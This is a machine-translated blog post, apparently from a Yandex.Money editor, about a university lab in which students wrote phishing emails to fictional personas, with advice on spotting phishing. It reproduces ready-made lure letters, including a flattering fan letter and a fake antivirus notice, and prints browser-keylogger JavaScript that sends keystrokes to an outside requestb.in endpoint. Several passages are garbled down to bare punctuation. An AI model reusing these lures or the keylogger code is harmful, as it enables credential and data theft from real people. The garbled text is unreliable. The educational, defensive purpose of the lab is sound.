哈Ha! 我是该博客的编辑,有时我还在大学教授病毒学。
我决定使教育过程多样化,并为五年制学生提出了几项作业-这样的练习和相关性,而不是从2003年开始编写代码。 任务之一是发明网络钓鱼电子邮件并将其发送给可能存在的虚构人员。 毕竟,如果您不知道如何进攻,那么您就不会捍卫自己,对吧?
我将展示发生的一切最好的事情:骗子可以代表Yandex.Money发送哪些信件,学生如何假装提供服务以及甜点-骗子现在正在使用的方法(例如,警惕的用户收到的几封信件)。
警告
不要从事网络钓鱼。 形式上,这是欺诈,根据俄罗斯联邦《刑法》第159.6条受到起诉。 实验室工作是在受控条件下进行的,信件被发送到预先准备好的盒子中,只有该帖子的作者才能使用。 警告学生注意网络钓鱼邮件在实验室外的潜在责任。
所有角色都是虚构的,与真实人物和组织的所有巧合都是随机的。 所有徽标,商标和名称均属于其各自所有者。
一年多以前,我已经讲过类似的故事。 从那时起,我成为了habrablog的编辑。 在工作中,我与不同部门(包括信息安全部门)进行了很多沟通。 整个公司对金钱都很合乎逻辑,因此正在相应地寻求安全性-安全服务(SB)保护内部的所有事物和所有人,还防止欺诈者企图代表该服务犯罪。
既然我决定给学生这样的任务,我想知道他们是否可以相对诚实地从虚构人物身上夺走虚构的钱。 动机在这里很重要-所有这些操作仅出于教育目的,以便将来的安全专家了解存在的威胁以及如何保护自己免受威胁的侵害。
戏剧性
所有人都是不同的-具有不同的经验,IT知识和对人的信念-因此,我想出了三个字符,并要求学生们找到解决这些问题的方法。 这些限制纯粹是技术性的-应将信件发送到指定的邮箱,不要发送垃圾邮件,并且应该有一种收集个人数据的方法。 哪些由学生决定。
完整的实验室任务在扰流板之下。
实验室工作 . 1. . napechata.li/form , . 2. , . 3. , . , , , . 4. — (, , , ) , . . 5. , , . . (, , ) . 6. , , . 7. , , . : 1. 2. , 3. 4. 5. ,
Valeria Valeryevna Golova,31岁,乌斯季卡梅诺哥尔斯克
私人律师事务所Soft Sign的律师。 邮件-odnagolowa@yandex.ru。
瓦莱里亚(Valeria)本质上是人文主义者,但内心却是技术专家。 她毕业于Ust-Kamenogorsk信息技术学院,并在一家四人的私营公司中担任系统管理员律师。
瓦莱里亚(Valeria)喜欢在社交网络上保存台灯图片,在LiveJournal上拥有一个博客,分享自己的梦想,在周日,她参加了免费音乐会,她在“乌斯季卡梅诺哥尔斯克免费音乐会”组中找到了免费音乐会。
Khusanboy Erdashevich Sotvondiev,19岁,圣彼得堡
出租车队“ Timoshinsky”的出租车司机。 邮件-husanboy7902301@mail.ru
Husanboy从Urgench来到圣彼得堡,在那里他担任了3年的出租车司机。 现在他继续在圣彼得堡的旧起亚里奥做同样的事情,他是从一位朋友那里继承下来的。 Husanboy曾经录制过说唱曲目并没有化名地发布它们,但是现在他只是在关注新歌手,因此他在所有流行的主题网站上都有注册。
Albert Mikhailovich Alberlive,54岁,哈巴罗夫斯克
个体经营。 邮件-al.ber.live@outlook.com
阿尔伯特·米哈伊洛维奇(Albert Mikhailovich)一生中看到了很多事情–他致信马夫罗迪(Mavrodi),向卡什皮罗夫斯基(Kashpirovsky)充水,并且是一家由22人组成的天狮铂金代理商。 现在,他再次等待退休,为了不浪费时间,他决定投资于比特币和Cashbury。 阿尔伯特·米哈伊洛维奇(Albert Mikhailovich)拥有所有社交网络的资料,所有俄语服务中的电子钱包以及对人和技术的不可思议的信念。
已发送
今年,学生的时间减少了-因此第一封信很快就到了。 尽管如此,它们中的大多数反映了学生在Internet上发现并试图应用于问题情况的真实的网络钓鱼模式。
阿尔伯特·阿尔伯利夫
老实说,这个角色最让我着迷-将会发生什么,会发出哪些信件以及从中提供哪些服务? 金融金字塔,电子钱包,加密货币? 学生们并不失望-收件箱中有来自大多数流行支付系统的有关所有这些主题的信件。 我想展示所有内容,但是不幸的是,这是不可能的。
代表Yandex.Money进行网络钓鱼
首先,我对代表Yandex.Money的信件感兴趣。
代表该服务寄信的所有学生都采用了类似的方法-宣布一种新产品,该产品将使您免于所有问题并帮助您赚钱。 正如我将在后面展示的那样,这与骗子的真实行为并不完全一致。
让我提醒您,Yandex.Money的所有正式应用程序都位于Yandex网站上的特殊部分 ,而新产品的公告也位于新闻服务中 。 如果您在无法理解的来源中突然看到有关Yandex.Money的异常或令人震惊的公告,请查看此处。
现在,让我们看看这些字母有什么问题。 特别是为此,我在走廊上看到了《金钱》的主编纳塔莎,并显示了屏幕截图。 Natasha知道他们在Money中如何写作和不写作的一切,这正是我利用的。
问题很简单:如何理解这不是我们写的? 我传送麦克风:
Yandex.Crypto钱包
最高层:目前尚不清楚用户为什么甚至收到有关此主题的电子邮件; 关于加密货币通常擅长的一封信,但不清楚如何对我有用。
根据文字:感叹号(我们几乎没有),办公室文员(确保交易安全-)+印刷术过失。
Yandex救援
-姓名+邮件正在流通中。
-不确定性:“妥协”是什么意思? 好吧,我该怎么办?
-又是总理府。
-我想知道什么是“确定的康复”。
-没有连接标题+按钮(我们通常尝试使此组合给出有关本质的一般概念)。
技术支持Yandex.Money
这里的一切都很糟糕:从诸如粗心设计之类的琐事到主要消息(为什么否则,该帐户将无法恢复-这是勒索勒索)。
总的来说,娜塔莎总结道,我们不是那样写的。 让我们继续其他值得注意的例子。
给阿尔伯特的热信新的创新矿工
进步无后顾之忧。
您一直想触及加密货币的世界,但不知道从哪里开始? 当您不使用计算机时,请使用我们的矿机。 时间甚至会为您服务。
前进。
一切一时兴起http://clc.am/
这封信中的所有内容都很好-仅缺少带有号召性用语的普通按钮。 而是在下面有一个小链接,它仍然没有单击。 通常,在加密货币市场中潜在的密码学完全失败。
承诺的s头-无需付出努力,一切都可以自行运作,无需投资。 好,是的,当然。
新一代投资交易平台
这里需要任何评论吗?
照片库中的照片库
如何增加团结精神? 当然,请使用照片库中的照片。 令人惊讶的是,在同一封信的下面,没有西装的微笑人。
瓦莱里亚(Valeria Golova)
瓦莱里亚(Valeria)从LiveJournal,VK,清晰的梦想课程,有活动的站点,甚至从她博客博客的支持者那里收到了许多信件。
瓦莱里亚的热门来信
学习不会停滞不前,不断发展。 瓦莱里亚(Valeria)可以选择广告类别-为什么不利用这样的优惠呢?
“攻击者”尝试过-信件中的链接指向免费托管的网站,他们以LiveJournal样式绘制了一种用于输入个人数据和卡信息的表格。
不怀疑是很容易的-只需检查地址栏即可。 另外,当我第一次打开此链接并输入虚构的地图时,我看到了以下弹出窗口:
他们警告您不要白费力气-这个网站真的很危险。
这些免费托管的“站点”不会持续很长时间,并且也充满了水印。 在付费托管(以及二级域名)上,您可以发送有关网络钓鱼和欺诈的投诉。 实践证明,此类站点已被积极阻止-例如,我们的安全理事会在检测到任何新的欺诈方案时会定期向注册服务商发送申请。
LiveJournal桌面应用程序
这些家伙不是太懒惰,甚至编写了一个桌面应用程序-很好,做得很好。 甚至在不破坏互联网的情况下查看出版物。
该链接指向exe文件: http://xxx.193.52.92/livejournal_desktop_1.0.3b.exe 。 当然,我不会上传。
从可疑来源(邮件是非常可疑的来源)安装任何应用程序之前,请访问官方网站,查看是否存在该网站。 如果有,请从那里安装。
浏览器扩展
我爱我的学生,几乎没有限制他们的想象力。 这导致这样的事实来了。 我完整地带了它-它是如此的美丽。
> , . "Your Favourite Song". , -! , , ! . , , , , - -. - , . . > 1. https://goo-gl.ru/OK zip-. 2. zip- . 3. . 4. " ". 5. , keylogExten. 6. . 7. ! > , "Your Favourite Song".
在这里,该方法是今年发送的最激进的方法。 通过引用-简称,可重定向到云存储。 有一个浏览器键盘记录器,打包在两个存档中。 它是一个简单的事件侦听器,它在jquery上运行,侦听keydown事件,收集数据包中的代码,然后将其发送到服务器。
function sendSymOnServer(page, data) { var xhr = new XMLHttpRequest(); var body = 'page = ' + encodeURIComponent(page) + '&data = ' + encodeURIComponent(data); xhr.open("POST", 'https://requestb.in/1fa7izj1', true); xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xhr.send(body); }
自然,永远不要安装不必要的扩展,特别是在描述中带有单词keylog的扩展。
写,剪
与去年一样,辉煌的文案也并非没有。 当我写这篇文章时,结果发现其他人是撰稿人,那位学生从互联网上获取了文本。
至此,所有上下文广告标语都向我展示了关于清醒梦的一切。 在您看来,也是如此。 不用谢了。
粉丝来信
对我来说,最危险的网络钓鱼。 攻击者已经侦察了局势并正在遭受痛苦-每个人都难以应付赞美,奉承,认可和不对诈骗者做出回应。
这是一个例子:
晚上好,瓦莱里亚。
对于您的关注,我深表歉意。我的名字叫德米特里(Dmitry),首先,我要感谢您在杂志上的热烈发言。
受您的榜样启发,我可能会保持沉默,但您的昨天的梦想仍然没有消失。
他使我想起了一位名叫弗洛伊德·拉苏利(Freudun Rassuli)的才华横溢的画家的作品,更大程度上是他的画作《旅程之家》。
就像您一样,宇宙统一的主题与这位艺术家很接近:他确信任何创造都是我们能量与宇宙同步的产物。
我认为,对您的作品进行更详细的了解对您来说很有趣,因此我选择了他作品中最复杂,最深刻的作品。
不幸的是,我无法一次附加所有内容,但可以为您提供自己选择的存档。
https://cloud.mail.ru/public/Bg6E/WKr64w
我相信您会在这些惊人的画作中发现与您的梦想有很多相似之处。 而且我认为它们在您的博客上看起来很棒。
最好的问候
您的普通读者。
该链接包含Figures.exe文件,该文件中当然没有图形,但是有一个键盘记录程序。
还有另一位粉丝:
> , . > , . > . . , - ? . . . ""? . > , > .
链接下方是LiveJournal中免费托管上的另一种授权形式(至此-livejjournal)。 有https,因此浏览器不会发誓,但是您仍然需要仔细观察。
反网络钓鱼
顺便说一句,在最初的几封信之后,Yandex发出了一封信,内容是关于如何区分好信者和骗子的信。 守夜
休桑博伊(Hosanboy Sotvondiev)
学生们很好地理解了作业的喜剧精神,并发送了一些东西,使我产生了从紧张的笑声到困惑的各种情绪。 总的来说,在我看来他们做得很好。 角色收到说唱网站的来信,公共服务门户网站的罚款,出租车公司的来信(其中只有一个名字叫“ Timoshinsky”),并根据传统,收到了几封个人信。
Husanboy的热门来信未知的说唱艺术家比赛
首先,我找来这个页面参加比赛的陌生说唱艺术家。
伙计们,永远不要对这样的信件做出反应,这没有任何意义。
> ! > . - . , . 6 . . . , / , / , , .
如果您能够在不跳眼睛的情况下阅读本文,请告诉我们其中的内容。 字母后的链接指向30个字段的Google表单(特洛伊木马!),其中最著名的是:
- 登录密码。
- 创建(录制)音轨*时使用的程序。
- 可能对街舞*方向感兴趣的员工的社交网络中的电子邮件/链接。
- 全名 对街舞感兴趣的员工*。
切勿在陌生的网站上输入可能对街舞方向感兴趣的员工的全名。
Sotvondiev防病毒软件
下午好
随着我们的出租车车队处理个人数据政策的收紧,所有员工都需要使用经过认证的安全工具。
作为这种工具,我们公司选择了卡巴斯基Endpioint Security,它具有FSB SF / 019-3471和FSTEC No.3025的合格证书。
您可以通过以下链接下载此工具的安装文件:
http://aes.s.kaspersky-labs.com/endpoints/keswin11/11.0.1.90/russian-2778/bb0e36ac/keswin_11.0.1.90_en_aes256.exe
员工要求自行下载和安装Kaspersky Endpoint Security。 月底,在计划的检查过程中,资金将由我们部门的专家激活。
出租车车队“ Timoshinsky”的技术安全部门。
骗子不好意思使用拼写检查工具,这很好。 这有助于识别收件箱中的异端,并且无需阅读即可将其清除。 当然,链接会指向错误的位置-尽管还会链接到可执行文件。
未知的说唱艺术家及其居住地
而是,单击链接,查找并在那里...
这支学生小组决定确定如何在网上诱骗他人。 这并非没有意义-在这里,对过程的机制的理解很重要,因此尽管没有犹豫,但我还是对实验室进行了计数。
我再次重复-不要在未经验证的网站上的银行卡上输入任何数据。
在说唱歌手剪辑中拍摄
我走了,决心在视频中加注星标,然后出现:
>错误:此帐户已被暂停。
有关帐户所有者的详细信息:
名称:检测到网络钓鱼
用户名:
电子邮件:rap.ruXXXX@gmail.com
如您所见,服务甚至在我在Habré上谈论网络钓鱼之前就已经开始。 因此,我仅从报告中了解了网站上的内容。 再过一段时间,我将谈论我如何接收报告-这是一个独立的大故事。
歇斯底里的试驾
圣彼得堡起亚中心报告说,您有独特的机会租用全新的起亚Quoris汽车。 这是一个全新的商务舱模型,具有全新的引擎以及经过重新设计的悬架和变速箱系统。 最重要的是,您将获得一个前所未有的机会来购买这款车一个月! 供个人使用!!! 在城市中开车,尝试长途旅行,评估我们新车的质量和可靠性!
即使在信件中,这辆车上也有精美的图画,并链接到用于接收不同信息的在线表格。
学生还使用了该角色正在驾驶朋友的汽车的信息,并且由于只剩下3辆汽车,激发了潜在受害者的兴趣。 一般来说,是时候跑步,着急并注册免费试驾了。
而且最好记住,互联网上没有免费的东西,不要被可疑的信件所欺骗。
网络钓鱼在野外是什么样的
上面的所有示例都是我的学生的幻想,它们与现实有关,只是它们都可以被编写和发送。 保护自己非常容易-只需仔细检查链接,不要从附件中下载无关的文件,并注意文本中的错别字。 而且,如果您没有在晦涩的网站上输入任何个人数据,那么您就可以度过一生,而不会发现偷钱或借小额贷款扫描护照时的情况。
我请安全理事会的同事展示现在真实存在的真实的网络钓鱼电子邮件。 这些仅是几个例子,说明诈骗者可以采取截然不同的技巧来赚钱。 实际上,还有更多,因此您需要为所有事情做好准备。
您的钱包已补充
用户收到一条有关其钱包已补充的消息。 在付款的评论中,有一个广告眼线笔和指向该站点的链接,据称您每天无需做任何事情就可以获得一千美元。
事实证明,诈骗者不仅可以伪造此类信件。 事实是伪造的信件很有可能不会通过邮件中的垃圾邮件过滤器。 但是,可能会达到从服务中进行的真正的小额付款后形成的来自服务的自动信函。
评论的链接通常指向一个站点,人们试图在这个站点上相对诚实地从人口中获取金钱。
您的IP地址已列出
据称来自Yandex.Money技术支持的一封信。 您已经知道如何与现在区分开来-感谢Natasha。
还有什么呢?
当然,网络钓鱼不仅涉及字母。
除博客阅读器以外的其他示例还向我们发送了邮件。 想象-这是一个欺诈性的Instagram广告,导致VK上的欺诈性公众,这导致了一个欺诈性的登陆站点,其中涉及欺诈性民意调查,据称他们为此支付了欺诈性金钱。
当然,他们并没有真正付钱。
这是假广告。
该链甚至具有“将链接发送给WhatsApp上的20个朋友以继续”的条件。 , .
- , « ?» ( , ) :
« 80000 , — . 150 ».
, , .
?
:
- , .
- , — , , .
- — , , — . , .
- , - , .
- .
- . , .
- , . , - .
- . .
, , , . , . .